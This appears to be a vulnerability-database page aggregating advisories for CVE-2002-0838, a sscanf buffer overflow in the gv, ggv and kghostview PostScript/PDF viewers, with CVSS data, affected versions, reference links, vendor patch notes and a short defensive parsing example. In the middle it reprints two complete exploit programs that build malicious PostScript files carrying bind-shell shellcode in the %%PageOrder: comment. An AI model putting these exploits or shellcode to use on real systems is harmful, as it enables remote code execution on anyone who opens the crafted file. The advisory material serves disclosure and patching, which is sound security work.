CVE-2002-0838
CVSS4.6
Published: 2002-10-10 00:00:00
Revised: 2016-10-17 22:22:25

[Original text] Buffer overflow in (1) gv 3.5.8 and earlier, (2) gvv 1.0.2 and earlier, (3) ggv 1.99.90 and earlier, (4) gnome-gv, and (5) kghostview in kdegraphics 2.2.2 and earlier, allows attackers to execute arbitrary code via a malformed (a) PDF or (b) PostScript file, which is processed by an unsafe call to sscanf.


[CNNVD] gv remote buffer overflow vulnerability (CNNVD-200210-245)

gv is a PDF and PostScript file viewer maintained by Johannes Plass that runs on many Unix operating systems.
gv uses sscanf() calls unsafely when parsing PostScript and PDF files; an attacker can exploit this vulnerability to execute arbitrary instructions on the system with the privileges of the user's process.
To exploit this vulnerability, an attacker must deliver a PDF or PostScript file and entice the user to open it from the command line. Because gv is normally not installed setuid root, the attacker can only execute arbitrary instructions with the privileges of the process viewing the file. The problem lies in the sscanf() function used to parse PostScript and PDF files.

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:gv:gv:2.7b4
cpe:/a:gv:gv:3.5.3
cpe:/a:ghostview:ghostview:1.4.1
cpe:/a:gv:gv:2.7b3
cpe:/a:gv:gv:3.1.6
cpe:/a:gv:gv:3.4.3
cpe:/a:gv:gv:3.5.2
cpe:/a:gv:gv:3.2.4
cpe:/a:gv:gv:3.4.2
cpe:/a:gv:gv:2.7b5
cpe:/a:gv:gv:3.1.4
cpe:/a:gv:gv:3.0.0
cpe:/a:gv:gv:3.4.12
cpe:/a:ghostview:ghostview:1.5
cpe:/a:ghostview:ghostview:1.4
cpe:/a:gv:gv:3.0.4
cpe:/a:ghostview:ghostview:1.3
cpe:/a:gv:gv:2.7b2
cpe:/a:gv:gv:2.7b1
cpe:/a:ggv:ggv:1.0.2
cpe:/a:gv:gv:2.7.6
cpe:/a:gv:gv:2.9.4
cpe:/a:gv:gv:3.5.8

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0838
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0838
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-245
(official data source) CNNVD

- Other links and resources

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-053.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-053.0
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000542
(UNKNOWN)  CONECTIVA  CLA-2002:542
http://marc.info/?l=bugtraq&m=103305615613319&w=2
(UNKNOWN)  BUGTRAQ  20020926 iDEFENSE Security Advisory 09.26.2002: Exploitable Buffer Overflow in gv
http://marc.info/?l=bugtraq&m=103305778615625&w=2
(UNKNOWN)  BUGTRAQ  20020926 Errata: iDEFENSE Security Advisory 09.26.2002: Exploitable Buffer Overflow in gv
http://marc.info/?l=bugtraq&m=103487806800388&w=2
(UNKNOWN)  BUGTRAQ  20021017 GLSA: ggv
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/47780&zone_32=category:security
(UNKNOWN)  CONFIRM  http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/47780&zone_32=category:security
http://www.debian.org/security/2002/dsa-176
(UNKNOWN)  DEBIAN  DSA-176
http://www.debian.org/security/2002/dsa-179
(UNKNOWN)  DEBIAN  DSA-179
http://www.debian.org/security/2002/dsa-182
(UNKNOWN)  DEBIAN  DSA-182
http://www.iss.net/security_center/static/10201.php
(VENDOR_ADVISORY)  XF  gv-sscanf-function-bo(10201)
http://www.kb.cert.org/vuls/id/600777
(VENDOR_ADVISORY)  CERT-VN  VU#600777
http://www.kde.org/info/security/advisory-20021008-1.txt
(UNKNOWN)  CONFIRM  http://www.kde.org/info/security/advisory-20021008-1.txt
http://www.mandriva.com/security/advisories?name=MDKSA-2002:069
(UNKNOWN)  MANDRAKE  MDKSA-2002:069
http://www.mandriva.com/security/advisories?name=MDKSA-2002:071
(UNKNOWN)  MANDRAKE  MDKSA-2002:071
http://www.redhat.com/support/errata/RHSA-2002-207.html
(UNKNOWN)  REDHAT  RHSA-2002:207
http://www.redhat.com/support/errata/RHSA-2002-212.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2002:212
http://www.redhat.com/support/errata/RHSA-2002-220.html
(UNKNOWN)  REDHAT  RHSA-2002:220
http://www.securityfocus.com/bid/5808
(VENDOR_ADVISORY)  BID  5808

- Vulnerability information

gv remote buffer overflow vulnerability
Medium severity; boundary condition error
2002-10-10 00:00:00 2005-10-20 00:00:00
Remote / Local

gv is a PDF and PostScript file viewer maintained by Johannes Plass that runs on many Unix operating systems.
gv uses sscanf() calls unsafely when parsing PostScript and PDF files; an attacker can exploit this vulnerability to execute arbitrary instructions on the system with the privileges of the user's process.
To exploit this vulnerability, an attacker must deliver a PDF or PostScript file and entice the user to open it from the command line. Because gv is normally not installed setuid root, the attacker can only execute arbitrary instructions with the privileges of the process viewing the file. The problem lies in the sscanf() function used to parse PostScript and PDF files.

- Advisories and patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Use the Kghostview tool instead of gv to view PDF or PostScript files.
Vendor patches:
gv
--
The vendor has not yet provided a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:

http://wwwthep.physik.uni-mainz.de/~plass/gv/

- Vulnerability information (21871)

GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (1) (EDBID:21871)
linux local
2002-09-26 Verified
0 zen-parse
N/A
source: http://www.securityfocus.com/bid/5808/info

gv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems.

It has been reported that an insecure sscanf() function exists in gv. Due to this function, an attacker may be able to put malicious code in the %%PageOrder: portion of a file. When this malicious file is opened with gv, the code would be executed in the security context of the user opening the file.
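The `%%PageOrder:` line is a PostScript DSC comment that carries one of a few short keywords, so a parser can bound it. The block below is an added example, not gv's code or part of the EDB entry: it shows the bounded parse beside the shape of the unbounded `sscanf` call the advisory describes, plus a triage check a defender can run over a suspect PostScript header; `PAGEORDER_MAX`, the function names and the sample lines are assumptions.

```c
#include <ctype.h>
#include <string.h>
#define PAGEORDER_MAX 32   /* DSC defines only Ascend, Descend, Special */

/* Vulnerable shape, for contrast (never called here): no width on %s, so an
 * overlong value runs past order[]:  sscanf(line, "%%%%PageOrder: %s", order); */

/* Bounded parse: returns 1 and fills out on a well-formed %%PageOrder: line,
 * 0 for any other line, -1 when the value would not fit (malformed input). */
int parse_page_order(const char *line, char *out, size_t outsz)
{
    static const char key[] = "%%PageOrder:";
    if (strncmp(line, key, sizeof key - 1) != 0)
        return 0;
    const char *p = line + sizeof key - 1;
    size_t n = 0;
    while (*p == ' ' || *p == '\t') p++;                 /* skip separator */
    while (p[n] && !isspace((unsigned char)p[n])) n++;  /* measure token */
    if (n == 0 || n >= outsz)
        return -1;
    memcpy(out, p, n);
    out[n] = '\0';
    return 1;
}

/* Defender-side triage: count "%%Key: value" DSC lines whose value exceeds
 * limit bytes. Real DSC values are short; an oversized one marks a crafted file. */
int count_overlong_dsc(const char *ps, size_t limit)
{
    int bad = 0;
    while (*ps) {
        const char *nl = strchr(ps, '\n');
        size_t len = nl ? (size_t)(nl - ps) : strlen(ps);
        const char *colon = (len > 2 && ps[0] == '%' && ps[1] == '%')
                          ? memchr(ps, ':', len) : NULL;
        if (colon && (size_t)(ps + len - colon - 1) > limit)
            bad++;
        if (!nl) break;
        ps = nl + 1;
    }
    return bad;
}

/* 1 if line parses as a PageOrder comment whose value equals expect. */
int page_order_is(const char *line, const char *expect)
{
    char out[PAGEORDER_MAX];
    return parse_page_order(line, out, sizeof out) == 1 && strcmp(out, expect) == 0;
}

/* Constructs a %%PageOrder: line carrying value_len filler bytes (the oversized
 * shape the advisory describes) and checks that both routines reject it. */
int overlong_value_rejected(size_t value_len)
{
    char line[2048], out[PAGEORDER_MAX];
    if (value_len > sizeof line - 16) return 0;
    memcpy(line, "%%PageOrder: ", 13);
    memset(line + 13, 'G', value_len);
    line[13 + value_len] = '\n'; line[14 + value_len] = '\0';
    return parse_page_order(line, out, sizeof out) == -1 && count_overlong_dsc(line, PAGEORDER_MAX) == 1;
}
```

Rejecting rather than silently truncating (as a `%31s` width would) keeps the malformed file visible to the caller, which is what an intake check wants.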

// gv <=3.5.8 remote exploit by priestmaster
#include <stdio.h>
#include <stdlib.h>	// atoi, strtoul, exit
#include <string.h>	// memset, memcpy, strlen

#define STDALIGN	264	// Standard align
#define SCBUF		800	// Shellcode buffer size
#define GARBAGE		100	// Garbage for the end
				// of the evil_buffer
#define NOP		'G'	// instead of "\x90" 


// Copyright (c) Ramon de Carvalho Valle
// Bind shell port number 65535
char bindcode[]= /*  72 bytes                          */
    "\x31\xdb"              /*  xorl    %ebx,%ebx                 */
    "\xf7\xe3"              /*  mull    %ebx                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x43"                  /*  incl    %ebx                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x6a\x02"              /*  pushl   $0x02                     */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\xb0\x66"              /*  movb    $0x66,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    "\xff\x49\x02"          /*  decl    0x02(%ecx)                */
    "\x6a\x10"              /*  pushl   $0x10                     */
    "\x51"                  /*  pushl   %ecx                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\x43"                  /*  incl    %ebx                      */
    "\xb0\x66"              /*  movb    $0x66,%al                 */            
    "\xcd\x80"              /*  int     $0x80                     */
    "\x89\x41\x04"          /*  movl    %eax,0x04(%ecx)           */
    "\xb3\x04"              /*  movb    $0x04,%bl                 */
    "\xb0\x66"              /*  movb    $0x66,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    "\x43"                  /*  incl    %ebx                      */
    "\xb0\x66"              /*  movb    $0x66,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    "\x59"                  /*  popl    %ecx                      */
    "\x93"                  /*  xchgl   %eax,%ebx                 */
    "\xb0\x3f"              /*  movb    $0x3f,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    "\x49"                  /*  decl    %ecx                      */
    "\x79\xf9"              /*  jns     <bindsocketshellcode+45>  */
    "\x68\x2f\x2f\x73\x68"  /*  pushl   $0x68732f2f               */
    "\x68\x2f\x62\x69\x6e"  /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */            
    //"\xb0\x0b"              /*  movb    $0x0b,%al   		  */
    // 0b isn't allowed (filter). I use xor %eax, %eax
    // and eleven inc %al. It's the same as \xb0\x0b
    "\x31\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0"
    "\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0"
    "\xcd\x80"
; 

// How to start the exploit
void usage(char *prgname)
{
       printf("\nUsage: %s align retaddr \n\n"
                       "align (0 on SUSE 7.0)\n"
                       "retaddr (return address (should point to shellcode))\n",
                       prgname);	// argument for the %s above
       exit(0);
}

/////////////////////////////////////////

int main(int argc, char **argv)
{
	int align;	// Align for the buffer
	long retaddr;	// return address
	
	char buf[BUFSIZ];	// The evil buffer
	char *p;		// Pointer to evil buffer

	if(argc != 3)		// 2 Arguments required
	{
		usage(argv[0]);
	}

	// Get align and return address from parameters
	align = atoi(argv[1]);
	retaddr = strtoul(argv[2], NULL, 0);	// endptr, then base (0 = auto-detect 0x prefix)

	/* DEBUG, Shellcode testing
	void (*dsr)();
	(long) dsr = &bindcode; 
	dsr(); */

	// Point to buffer
	p = buf;

	// Memset the buffer with NOP's
	memset(p, NOP, BUFSIZ);

	p += STDALIGN+align;

	// Write return address in buffer (It's a very simple stack overflow).
	*((void **)p) = (void *) retaddr;
	p+=4;

	// Put shellcode in buffer
	p+=SCBUF-strlen(bindcode)-1;
	memcpy(p, bindcode, strlen(bindcode));
	p += strlen(bindcode);
	
	// Add some garbage to end of buffer
	p += GARBAGE;
	
	// Null terminate buffer
	*p = 0;
	
	// Generate pdf file
	printf("%%!PS-Adobe-3.0\n");
	printf("%%%%Creator: groff 1.16 (with modifications by zen-parse by hand 1.00a)\n");
	printf("%%%%CreationDate: Sat Jun 15 15:30ish\n");

	// In page order, the stack overflow occur.
	printf("%%%%PageOrder: %s\n", buf);
	printf("%%%%EndComments\n");
	printf("%%%%EOF");
	return 0;
}

- Vulnerability information (21872)

GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (2) (EDBID:21872)
linux local
2002-09-26 Verified
0 infamous42md
N/A
source: http://www.securityfocus.com/bid/5808/info
 
gv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems.
 
It has been reported that an insecure sscanf() function exists in gv. Due to this function, an attacker may be able to put malicious code in the %%PageOrder: portion of a file. When this malicious file is opened with gv, the code would be executed in the security context of the user opening the file.

/*
 * gv postscript viewer exploit , infamous42md AT hotpop DOT com
 *
 * run of the mill bof.  spawns a remote shell on port 7000.  woopty doo. if
 * someone has been able to exploit the heap overflow in cfengine, please email
 * me and teach me something. after days of pain i've concluded it's not
 * possible b/c you can't manipulate the heap enough to get anything good in
 * front of you.  please prove me wrong so i can learn.
 *
 * shouts to mitakeet
 *
 *  [n00b@localho.outernet] netstat -ant | grep 7000
 *  [n00b@localho.outernet] gcc -Wall -o gvown gvown.c
 *  [n00b@localho.outernet] ./gvown 0xbffff350
 *  [n00b@localho.outernet] ./gv h4x0ring_sacr3ts_uncuv3red.ps
 *  [n00b@localho.outernet] netstat -ant | grep 7000
 *  tcp        0      0 0.0.0.0:7000            0.0.0.0:*               LISTEN
 */
#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define NOP 0x90
#define NNOPS 512
#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)
#define BS 0x10000
#define RETADDR_BYTES 400
#define PS_COMMENT "%!PS-Adobe- "
#define OUTFILE "h4x0ring_sacr3ts_uncuv3red.ps"


/* call them on port 7000, mine */
char remote[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";


int main(int argc, char **argv)
{
    int len, x, fd;
    char    buf[BS];
    u_long  retaddr;

    if(argc < 2){
        fprintf(stderr, "Usage: %s < retaddr >\n", argv[0]);
        return EXIT_FAILURE;
    }
    sscanf(argv[1], "%lx", &retaddr);

    /* create 3vil buf */
    memset(buf, NOP, BS);
    strcpy(buf, PS_COMMENT);
    len = strlen(buf);
    for(x = 0; x < RETADDR_BYTES - 3; x += sizeof(retaddr))
        memcpy(buf+x+len, &retaddr, sizeof(retaddr));
    len += x + NNOPS;
    strcpy(buf+len, remote);
    strcat(buf+len, "\n");
    len += strlen(remote) + 1;   /* + NULL */

    /* create the 3vil file */
    if( (fd = open(OUTFILE, O_RDWR|O_CREAT|O_EXCL, 0666)) < 0)
        die("open");

    if(write(fd, buf, len) < 0)
        die("write");

    close(fd);

    return 0;
}

- Vulnerability information

8649
gv sscanf Multiple File Format Handling Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

- Timeline

2002-12-04 Unknown
2004-08-12 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

GV Malformed PDF/PS File Buffer Overflow Vulnerability
Boundary Condition Error 5808
Yes Yes
2002-09-26 12:00:00 2009-07-11 05:06:00
Vulnerability discovery credited to zen parse <zen-parse@gmx.net>.

- Affected program versions

KDE KDE 3.0.3 a
KDE KDE 3.0.3
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ FreeBSD FreeBSD 4.7 -STABLE
+ Mandriva Linux Mandrake 9.0
KDE KDE 3.0.2
+ Mandriva Linux Mandrake 8.2
KDE KDE 3.0.1
KDE KDE 3.0
+ Conectiva Linux 8.0
KDE KDE 2.2.2
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 i386
+ RedHat Linux Advanced Work Station 2.1
+ Sun Linux 5.0.7
+ Sun Linux 5.0.6
+ Sun Linux 5.0.5
KDE KDE 2.2.1
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
KDE KDE 2.2
KDE KDE 2.1.2
+ Conectiva Linux 7.0
KDE KDE 2.1.1
KDE KDE 2.1
KDE KDE 2.0.1
+ Conectiva Linux 6.0
KDE KDE 2.0
KDE KDE 1.2
- S.u.S.E. Linux 6.4
KDE KDE 1.1.2
+ Caldera OpenLinux 2.3
+ Mandriva Linux Mandrake 7.0
KDE KDE 1.1.1
KDE KDE 1.1
gv gv 3.5.8
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Gentoo Linux 1.4_rc1
+ Gentoo Linux 1.2
- RedHat Linux 7.3
+ RedHat Linux 7.1 pseries
+ RedHat Linux 7.1 iseries
+ Sun Linux 5.0
gv gv 3.5.3
gv gv 3.5.2
gv gv 3.4.12
gv gv 3.4.3
gv gv 3.4.2
gv gv 3.2.4
gv gv 3.1.6
gv gv 3.1.4
gv gv 3.0.4
gv gv 3.0.0
gv gv 2.9.4
gv gv 2.7.6
gv gv 2.7b5
gv gv 2.7b4
gv gv 2.7b3
gv gv 2.7b2
gv gv 2.7b1
GhostView GhostView 1.5
GhostView GhostView 1.4.1
GhostView GhostView 1.4
GhostView GhostView 1.3
ggv ggv 1.99.90
+ Gentoo Linux 1.4_rc1
+ Gentoo Linux 1.2
ggv ggv 1.1.96
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
ggv ggv 1.0.2
ggv ggv 0.82
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
KDE KDE 3.0.4
+ Conectiva Linux 8.0
+ Gentoo Linux 1.4_rc1
+ Gentoo Linux 1.2

- Unaffected program versions

KDE KDE 3.0.4
+ Conectiva Linux 8.0
+ Gentoo Linux 1.4_rc1
+ Gentoo Linux 1.2

- Vulnerability discussion

gv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems.

It has been reported that an insecure sscanf() function exists in gv. Due to this function, an attacker may be able to put malicious code in the %%PageOrder: portion of a file. When this malicious file is opened with gv, the code would be executed in the security context of the user opening the file.

- Exploit

Exploit contributed by zen parse <zen-parse@gmx.net>. Exploit code has also been provided by priest priest <priest@priestmaster.org>, and <infamous41md@hotpop.com>.

- Solution

Red Hat has released an advisory. Updates for ggv are available. See the referenced advisory for further details.

The KDE Project has made a patch available for affected versions of kdegraphics/kghostview. Additionally, the KDE Project has identified the 3.0.4 series as being fixed against this vulnerability.

Gentoo Linux has released an advisory for ggv. Users who have installed app-text/ggv-1.99.90 and earlier are urged to update their systems by issuing the following commands:

emerge rsync
emerge ggv
emerge clean

Debian has released a new advisory DSA 179-1. Fixes for gnome-gv 0.82 and gnome-gv 1.1.96 are available. Debian GNU/Linux 3.0 alias woody also ships with KDE 2.2.2, which includes a vulnerable kghostview in the KDE-Graphics package.

Conectiva Linux has released an advisory. Information about obtaining and installing fixes for gv and kdegraphics can be found in the referenced advisory.

RedHat has released an advisory, RHSA-2002:220-40, that contains many fixes. Information about obtaining and applying fixes are available in the referenced advisory.

Red Hat has released an updated RHSA-2002-207 advisory containing new fixes to address this issue in Red Hat 7.1 pseries and iseries. Please see the attached web reference for further information.

Gentoo has released an advisory for gv that includes fixes. Fixes may be applied with the following commands:
emerge sync
emerge -pv ">=app-text/gv-3.5.8-r4"
emerge ">=app-text/gv-3.5.8-r4"

Fixes:


ggv ggv 0.82

ggv ggv 1.0.2

ggv ggv 1.1.96

ggv ggv 1.99.90

KDE KDE 2.0

KDE KDE 2.0.1

KDE KDE 2.1

KDE KDE 2.1.1

KDE KDE 2.1.2

KDE KDE 2.2

KDE KDE 2.2.1

KDE KDE 2.2.2

KDE KDE 3.0

KDE KDE 3.0.1

KDE KDE 3.0.2

KDE KDE 3.0.3 a

KDE KDE 3.0.3

gv gv 3.5.8

- References
